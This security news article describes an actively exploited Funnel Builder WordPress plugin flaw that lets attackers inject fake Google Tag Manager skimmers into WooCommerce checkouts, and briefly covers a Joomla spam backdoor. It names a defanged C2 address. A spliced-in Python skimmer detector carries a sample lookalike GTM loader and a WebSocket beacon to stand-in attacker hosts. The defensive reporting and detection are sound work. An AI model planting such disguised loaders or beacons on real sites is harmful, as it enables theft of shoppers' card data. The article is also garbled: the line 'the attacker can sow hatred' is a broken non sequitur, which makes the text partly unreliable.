
Funnel Builder Flaw Under Active Exploitation Allows WooCommerce Checkout Skimming

By Ravie Lakshmanan | May 16, 2026 | Vulnerability / Website Security

A critical security vulnerability affecting the Funnel Builder plugin for WordPress has come under active exploitation in the wild to inject malicious JavaScript code into WooCommerce checkout pages with the intent of stealing payment data.

Details of the exploitation were published by Sansec this week. The vulnerability does not currently have an official CVE identifier. It affects all plugin versions before 3.15.0.3. The plugin is used on over 40,000 WooCommerce stores.

The flaw allows unauthenticated attackers to inject malicious JavaScript into all of a store's checkout pages, the Dutch e-commerce security firm said. FunnelKit, which maintains Funnel Builder, released a patch for the vulnerability in version 3.15.0.3.

“Attackers plant fake Google Tag Manager scripts in the plugin’s ‘External Scripts’ setting,” it noted. “The injected code looks like normal code next to the actual store tags, but it loads a skimmer that steals credit card numbers, CVVs, and billing addresses at checkout.”

According to Sansec, Funnel Builder includes a publicly exposed checkout endpoint that lets the incoming request choose which funnel handler to use. However, older versions were designed in such a way that they never checked the caller’s permissions or restricted which methods could be invoked.

A bad actor can exploit this by issuing an unauthenticated request that reaches an unspecified internal method, which writes attacker-controlled data directly into the plugin’s global settings. The injected code is then rendered on every Funnel Builder checkout page.

As a result, the attacker can sow hatred

In at least one instance, Sansec said it saw a payload masquerading as a Google Tag Manager (GTM) loader to load JavaScript hosted on a remote domain. That script then opens a WebSocket connection to the attacker’s command-and-control (C2) server (“wss://protect-wss[.]com/ws”) to retrieve a skimmer tailored to the victim store.

The ultimate goal of the attack is to extract credit card numbers, CVVs, billing addresses, and other personal information that site visitors enter at checkout. Site owners are advised to update the Funnel Builder plugin to the latest version and review Settings > Checkout > External Scripts for anything they do not recognize and remove it.

“Disguising skimmers as Google Analytics or Tag Manager code is a recurring Magecart pattern, as reviewers tend to skip over anything that looks like a standard tracking tag,” Sansec said.
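The review step recommended above (and the reason it is easy to miss a lookalike tag) can be partly automated. The following is an added example, not code from Sansec or FunnelKit: it scans the raw contents of an “External Scripts” setting and flags any script that opens a WebSocket, or that looks like a Tag Manager loader but fetches from a host outside an assumed allowlist of Google tag hosts. The sample setting and the `example.invalid` hosts are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts a genuine Google tag loader is expected to fetch from.
# Extend this with any other vendor hosts your store knowingly uses.
TRUSTED_TAG_HOSTS = {
    "www.googletagmanager.com",
    "googletagmanager.com",
    "www.google-analytics.com",
}

SCRIPT_BLOCK_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
URL_RE = re.compile(r"""(?:https?|wss?)://[A-Za-z0-9.-]+(?:/[^\s'"<>)]*)?""")
# Markers that make a block "look like" a GTM / Analytics snippet to a reviewer.
GTM_HINT_RE = re.compile(r"googletagmanager|gtm\.js|GTM-|dataLayer", re.I)

# Constructed sample of an "External Scripts" setting: one genuine GTM snippet,
# one lookalike that loads gtm.js from an unrelated host, and a WebSocket beacon.
SAMPLE_SETTING = """
<script>(function(w,d,s,l,i){var j=d.createElement(s);
j.src='https://www.googletagmanager.com/gtm.js?id='+i;d.head.appendChild(j);
})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>
<script>(function(w,d,s,l,i){var j=d.createElement(s);
j.src='https://gtm-cdn.example.invalid/gtm.js?id='+i;d.head.appendChild(j);
})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>
<script>var ws=new WebSocket('wss://c2.example.invalid/ws');</script>
"""


def find_suspicious_scripts(external_scripts: str) -> list[dict]:
    """Return one finding per URL that a checkout 'External Scripts' box should not contain."""
    findings = []
    for attrs, body in SCRIPT_BLOCK_RE.findall(external_scripts):
        block = attrs + body
        looks_like_gtm = bool(GTM_HINT_RE.search(block))
        for url in URL_RE.findall(block):
            parsed = urlparse(url)
            host = (parsed.hostname or "").lower()
            if parsed.scheme in ("ws", "wss"):
                # A checkout tag has no business holding a live socket to a third party.
                findings.append({"reason": "websocket", "url": url})
            elif looks_like_gtm and host not in TRUSTED_TAG_HOSTS:
                # Dressed up as GTM, but the loader is fetched from elsewhere.
                findings.append({"reason": "gtm-lookalike", "url": url})
            elif host not in TRUSTED_TAG_HOSTS:
                findings.append({"reason": "unreviewed-host", "url": url})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_scripts(SAMPLE_SETTING):
        print(f"{f['reason']:15} {f['url']}")
```

Any `websocket` or `gtm-lookalike` finding is worth treating as a confirmed injection until proven otherwise; `unreviewed-host` entries are simply scripts to check against the store's own records.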

The disclosure comes weeks after Sucuri detailed a campaign in which Joomla websites were backdoored with heavily obfuscated PHP code that communicates with attacker-controlled C2 servers, receives and processes instructions sent by the operators, and serves spam content to visitors and search engines without the site owner’s knowledge. The main purpose is to boost the reputation of the sites promoted by the injected spam.

“The script works like a remote loader,” said security researcher Puja Srivastava. “It contacts the remote server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site should provide.”

“This method allows attackers to change the behavior of a compromised website at any time without modifying local files. An attacker can inject links to a spam product, redirect visitors, or dynamically display malicious pages.”
